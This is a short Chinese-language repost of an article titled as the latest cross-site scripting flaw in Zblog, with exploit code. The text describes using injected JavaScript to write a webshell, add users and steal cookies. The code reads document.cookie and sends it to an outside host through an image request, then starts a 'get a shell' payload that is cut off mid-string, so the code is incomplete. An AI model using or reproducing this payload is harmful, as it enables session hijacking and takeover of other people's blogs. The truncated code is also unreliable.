Zblog最新跨站漏洞及利用代码

程序员文章站 2022-04-07 18:03:15

Js里可以写shell，添加用户，偷取COOKIE然后模拟出真正的转向 ... 11-03-11...

　　js里可以写shell，添加用户，偷取cookie然后模拟出真正的转向

　　xmlhttp=poster();

　　cookie=document.cookie;

　　login=cookie.indexof(‘password’)==-1?0:1;

　　tolocation=’https://www.jb51.net/’;

　　//get cookie

　　x=new image();

　　x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

　　//get a shell

　　data=”txacontent=

上一篇：最新win2003 II6解析漏洞实战及应用

下一篇： ES6之super关键字详解